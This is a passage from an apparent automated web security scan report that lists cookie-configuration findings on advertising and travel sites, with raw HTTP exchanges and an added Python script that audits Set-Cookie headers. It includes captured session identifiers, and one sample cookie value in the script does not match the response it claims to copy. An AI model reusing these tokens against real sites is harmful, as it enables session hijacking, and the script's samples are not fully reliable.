NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; OrbitzRegistration="N,2,0,0"; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598618455:ss=1317596806325; mbox=session#1317600406536-142286#1317604079|PC#1317600406536-142286.19#1320194219|check#true#1317602279; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|egapp2192p.prod.orbitz.net; Domain=.orbitz.com; Path=/
Set-Cookie: curr=USD; Expires=Sat, 21-Oct-2079 03:52:52 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: MKTG=ABCDEFGHU0VNfEMxMTI4N3g3MTl8IHwxMzE3NjAyMzI1NDY3fEMxMTI4N3g3MTl8fDEwLzAyLzIwMTEgMTk6Mzg6NDUgUE18IHwg; Domain=orbitz.com; Expires=Wed, 02-Nov-2011 00:38:45 GMT; Path=/
Set-Cookie: dpc=HOTEL%7C2.2%7C%7Cbos%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-09%7C2011-10-16%7C%7C+%7C%26%26HE; Expires=Fri, 02-Dec-2011 00:38:45 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:38:45 GMT
Content-Length: 243900


...[SNIP]...

13.174. http://www.tumri.net/ads/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/ads

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/ads?ad_cl=3052&ad_se=http://www.tumri.net&lo_id=108455&ad_ty=onebyone&height=1&width=1&f1=,BOS&f2=,unknown&f3=,0&f4=,HOTEL&f5=,0&u1=&u2=BOS&u3=unknown&u4=unknown&u5=0&u6=0&u7=55.26 HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://fls.doubleclick.net/activityi;src=1653087;type=hotel756;cat=hotel329;u2=BOS;u3=unknown;u4=unknown;u5=0;u6=0;u7=55.26;u13=1;u15=US;u16=34A63N3;ord=1;num=418599216785?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C=-1000424298|547040017; t_opt=OPT-OUT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:09:11 GMT
Expires: Mon Oct 03 00:09:11 UTC 2011
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: C=-1000424298|547040017; Domain=.tumri.net; Expires=Tue, 02-Oct-2012 00:09:11 GMT; Path=/
Set-Cookie: JSESSIONID=4BD4DF728C0984070FCE52BC4AA1C77B; Path=/ads
Content-Length: 1
Connection: keep-alive



13.175. http://www.wtp101.com/f

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /f

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /f?c=675&e=1 HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!1762!3105!2445!1731; synclock=t; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; opvc=!3919,CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M#,1317600201; pvmap=!3919,1317600201,ova3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 03 Oct 2011 00:03:22 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:03:22 GMT; domain=.wtp101.com
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........D..;

13.176. http://www.wtp101.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1762 HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!2445!1731; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sun, 02 Oct 2011 23:58:07 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Tue, 01 Oct 2013 23:58:07 GMT; domain=.wtp101.com
Set-Cookie: s=!1762!2445!1731; path=/; expires=Tue, 01 Oct 2013 23:58:07 GMT; domain=.wtp101.com
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........D..;

13.177. http://www.wtp101.com/pull_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /pull_sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pull_sync?pid=openx HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&loc=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!2445!1731; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Sun, 02 Oct 2011 23:54:23 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://r.openx.net/set?pid=25afcb2d-854d-efb2-7940-1323bbd101a7&rtb=f9bdca69-e609-4297-9145-48ea56a0756c
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Tue, 01 Oct 2013 23:54:23 GMT; domain=.wtp101.com
Content-Length: 0
Connection: keep-alive


13.178. http://www.wtp101.com/push_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /push_sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /push_sync HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!1762!3105!2445!1731; synclock=t; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; opvc=!3919,CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M#,1317600201; pvmap=!3919,1317600201,ova3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 03 Oct 2011 00:03:21 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:03:21 GMT; domain=.wtp101.com
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........D..;

13.179. http://www9.effectivemeasure.net/v4/em_js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www9.effectivemeasure.net
Path:   /v4/em_js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v4/em_js?flag=0&v=&vt=&hl=&sv=0&pv=&pn=&p=aHR0cDovL3d3dy5nb2FsLmNvbS9lbi90ZWFtcy9lbmdsYW5kLzk3L21hbi11dGQtbmV3cw%3D%3D&r=&f=1&ns=_em&rnd=0.11160158668644726&u=&sf=1& HTTP/1.1
Host: www9.effectivemeasure.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hl=1; vt=ad466b7502917b9a0779b9e202024e62e18088e413-981323754e62e3b1

Response

HTTP/1.1 200 OK
P3P: policyref="http://www.effectivemeasure.net/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Pragma: no-cache
Cache-Control: no-cache
Cache-Control: no-cache, must-revalidate
Pragma-directive: no-cache
Cache-Directive: no-cache
Expires: 0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: hl=1; expires=Tue, 01-Nov-2011 23:52:45 GMT; path=/; domain=.effectivemeasure.net
Set-Cookie: vt=92ca95cf72da02be93a9b9e202024e62e18088e413-981323754e88f94d; expires=Wed, 26-Sep-2012 23:52:45 GMT; path=/; domain=.effectivemeasure.net
Set-Cookie: v=452d73c7cba4bbda22aaf13bd6fa4e88f8d57af834-210214684e88f94d338_5280; expires=Mon, 03-Oct-2011 00:22:45 GMT; path=/; domain=.effectivemeasure.net
Content-type: text/javascript
Connection: close
Content-Length: 186
Date: Sun, 02 Oct 2011 23:52:45 GMT
Server: C20

_em._domain="goal.com";_em.setCkHl();_em.setCkVt("92ca95cf72da02be93a9b9e202024e62e18088e413-981323754e88f94d");_em.setCkV("452d73c7cba4bbda22aaf13bd6fa4e88f8d57af834-210214684e88f94d");

14. Cookie without HttpOnly flag set
There are 296 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript (for example through document.cookie). This measure prevents an injected script, such as one delivered by cross-site scripting, from trivially capturing the cookie's value and sending it to an attacker-controlled host.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless legitimate client-side scripts within your application specifically need to read or set a cookie's value, set the HttpOnly flag by including this attribute in the relevant Set-Cookie header.

You should be aware that the restrictions imposed by the HttpOnly flag can be circumvented in some circumstances (historically, for example, by cross-site tracing against a server that still answers HTTP TRACE requests, which echoes the request's Cookie header back to the caller), and that an injected script can simply drive the application as the victim from inside the browser without ever reading the cookie. Numerous other serious attacks can therefore be delivered by client-side script injection aside from simple cookie stealing; HttpOnly is a defence-in-depth measure, not a fix for the injection itself.
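As an added example that is not part of the scanner report, the following Python script applies the two checks behind section 13 (cookie scoped to a parent of the issuing domain, instances 13.171 to 13.179 above) and section 14 (cookie without HttpOnly flag set) to raw Set-Cookie header values. It also flags a missing Secure attribute, which goes beyond the two issue types shown here. The sample headers are copied from responses in this report, except the last, which is a constructed hardened cookie for contrast; the SESSION_NAMES list and the hex-value rule are this script's own assumptions about what "appears to contain a session token" means, not the scanner's heuristic.

```python
"""Audit Set-Cookie headers for the cookie issues listed in this report.

Added example, not part of the scanner output. SESSION_NAMES and the
pure-hex rule are this script's own assumptions about what "appears to
contain a session token" means.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Cookie names that conventionally carry a session identifier (assumption).
SESSION_NAMES = {"jsessionid", "phpsessid", "asp.net_sessionid", "sessionid", "sid"}
HEX = set("0123456789abcdefABCDEF")


@dataclass
class Cookie:
    name: str
    value: str
    # Attribute names lower-cased; bare flags (Secure, HttpOnly) map to None.
    attrs: Dict[str, Optional[str]] = field(default_factory=dict)


@dataclass
class Finding:
    cookie: str
    issues: List[str]
    session_token: bool


def parse_set_cookie(header: str) -> Cookie:
    """Parse one Set-Cookie header value; tolerant of odd values such as the
    trailing '|' and '"' characters seen in the orbitz.com responses above."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    cookie = Cookie(name.strip(), value.strip())
    for attr in parts[1:]:
        if not attr:
            continue
        key, sep, val = attr.partition("=")
        cookie.attrs[key.strip().lower()] = val.strip() if sep else None
    return cookie


def is_parent_domain(issuing_host: str, domain_attr: Optional[str]) -> bool:
    """True when Domain= names a proper parent of the host that set the cookie,
    i.e. the cookie will also be sent to every sibling subdomain."""
    if not domain_attr:
        return False
    domain = domain_attr.lower().lstrip(".")
    host = issuing_host.lower()
    return host != domain and host.endswith("." + domain)


def looks_like_session_token(cookie: Cookie) -> bool:
    """Heuristic: a well-known session cookie name, or a long pure-hex value."""
    lowered = cookie.name.lower()
    if lowered in SESSION_NAMES or "session" in lowered:
        return True
    return len(cookie.value) >= 16 and set(cookie.value) <= HEX


def audit_cookie(issuing_host: str, header: str) -> Finding:
    """Apply the report's checks (plus a Secure-flag check) to one Set-Cookie header."""
    cookie = parse_set_cookie(header)
    issues = []
    if is_parent_domain(issuing_host, cookie.attrs.get("domain")):
        issues.append("cookie scoped to parent domain")
    if "httponly" not in cookie.attrs:
        issues.append("cookie without HttpOnly flag set")
    if "secure" not in cookie.attrs:
        issues.append("cookie without Secure flag set")
    return Finding(cookie.name, issues, looks_like_session_token(cookie))


def audit_response(issuing_host: str, set_cookie_headers: List[str]) -> List[Finding]:
    """Audit every Set-Cookie header of one response; clean cookies are omitted."""
    results = [audit_cookie(issuing_host, h) for h in set_cookie_headers]
    return [f for f in results if f.issues]


# Set-Cookie values copied from responses in this report, plus one
# constructed hardened cookie (www.example.test) for contrast.
SAMPLES = [
    ("www.orbitz.com", "logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|; Domain=.orbitz.com; Path=/"),
    ("www.wtp101.com", "tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:03:22 GMT; domain=.wtp101.com"),
    ("ads.adxpose.com", "JSESSIONID=495FD43AF8795ECDFF0FF0915EA3CEDB; Path=/"),
    ("as00.estara.com", "fsserver__SESSION____SECURE__=s-5201.estara.com; path=/fs; domain=.estara.com; secure"),
    ("www.example.test", "sid=0123456789abcdef0123456789abcdef; Path=/; Secure; HttpOnly; SameSite=Lax"),
]

if __name__ == "__main__":
    for host, header in SAMPLES:
        finding = audit_cookie(host, header)
        tag = " (appears to contain a session token)" if finding.session_token else ""
        print(f"{host}: {finding.cookie}{tag}")
        for issue in finding.issues:
            print(f"  - {issue}")
```

Run directly, the script prints the findings per cookie; audit_response() drops cookies with no issues, so a response whose cookies all carry Secure and HttpOnly and no Domain attribute yields an empty list. One deliberate simplification: a Domain attribute equal to the issuing host still widens the cookie to that host's subdomains under RFC 6265, but the check above, like the report, flags only a proper parent domain.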



14.1. http://ads.adxpose.com/ads/ads.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/ads.js?uid=eaa3bCBGoZRHY9Na_666924 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0666653885873574&output=html&h=250&slotname=7372794801&w=300&ea=0&flash=10.3.183&url=http%3A%2F%2Fads.pubmatic.com%2Fhosteddefaulttags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&dt=1317606797018&bpp=7&shv=r20110921&jsv=r20110914&correlator=1317606797027&frm=8&adk=4114293891&ga_vid=1069027809.1317606797&ga_sid=1317606797&ga_hid=1887245699&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&dff=times%20new%20roman&dfs=16&adx=0&ady=0&biw=-12245933&bih=-12245933&ifk=2019610879&loc=http%3A%2F%2Fads.pubmatic.com%2FHostedDefaultTags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=12
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ec39c893-8f48-41a8-9b1f-be5afaba100a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=495FD43AF8795ECDFF0FF0915EA3CEDB; Path=/
ETag: "20773-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 01:53:16 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...

14.2. http://afe.specificclick.net/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://afe.specificclick.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?l=24038&sz=728x90&wr=j&t=j&u=http%3A%2F%2Fdm.travelocity.com%2Fhtml.ng%2Fadsize%3D728x90%26site%3Dtravelocity%26cobrand%3DTRAVELOCITY%26locale%3Den%26area%3Dhotel%26dest%3DBOS%26paxa%3D0%26paxs%3D0%26paxc%3D0%26adloc%3DNA%26random%3D771852%26tile%3D128609801075344%26section%3Dresults&r=http%3A%2F%2Ftravel.travelocity.com%2Fhotel%2FHotelAvailability.do%3Bjsessionid%3D74C1C04EA1B1607D7CD2E1313B9B2779.p0617&rnd=876971 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=7223935ceaae2e8049f67e6c582a; Path=/
Content-Type: application/javascript;charset=ISO-8859-1
Date: Mon, 03 Oct 2011 00:15:01 GMT
Content-Length: 2104

document.write('<div style="z-index:10; position:relative; width:728px">'+'<scr'+'ipt language="JavaScript" type="text/javascript" src="http://view.atdmt.com/DWC/jview/352348532/direct/01?click=http:/
...[SNIP]...

14.3. http://aon.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://aon.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20gpv_pageName%3D/site/search.jsp%7C1317605245122%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C81DF03B10ABEDA473F7CB693F3AAC01; Path=/
Content-Type: text/html;charset=utf-8
Date: Mon, 03 Oct 2011 01:11:36 GMT
Content-Length: 72723

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>

   <SCRIPT LANGUAGE="JavaScript">
       URL = window.location
...[SNIP]...

14.4. http://as00.estara.com/fs/rules.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://as00.estara.com
Path:   /fs/rules.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. Some of the cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fs/rules.php?accountid=200106297609&title=Priceline.com%20-%20hotel%2C%20hotel%20reservation%2C%20cheap%20hotel%2C%20las%20vegas%20hotel%2C%20boston%20hotel%2C%20hotel%20deal%2C%20ne&referrer=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2FsearchHotels.do%3Fsession_key%3D711510AC721510AC2011100300374475eeb1270807%26plf%3Dpclh%26INIT_SESSION%3Dtrue%26refid%3DPLAWAYNETWORK%26refclickid%3DTRIP_HOTELSEARCH%26searchType%3DCITY%26cityName%3Dbos%26numberOfRooms%3D1%26hotelBrand%3D%26searchHotelName%3D%26starRating%3D-1%26checkInDate%3D10%252F09%252F2011%26checkOutDate%3D10%252F16%252F2011%26KMode%3DY%26selectedTab%3D0%26passingValues%3DYES%26affiliateSubID%3D514A&w=1920&h=1200&d=16&platform=Win32&ua=Mozilla%2F5.0%20(Windows%20NT%206.1%3B%20WOW64)%20AppleWebKit%2F535.1%20(KHTML%2C%20like%20Gecko)%20Chrome%2F14.0.835.187%20Safari%2F535.1&cs=ISO-8859-1&estara_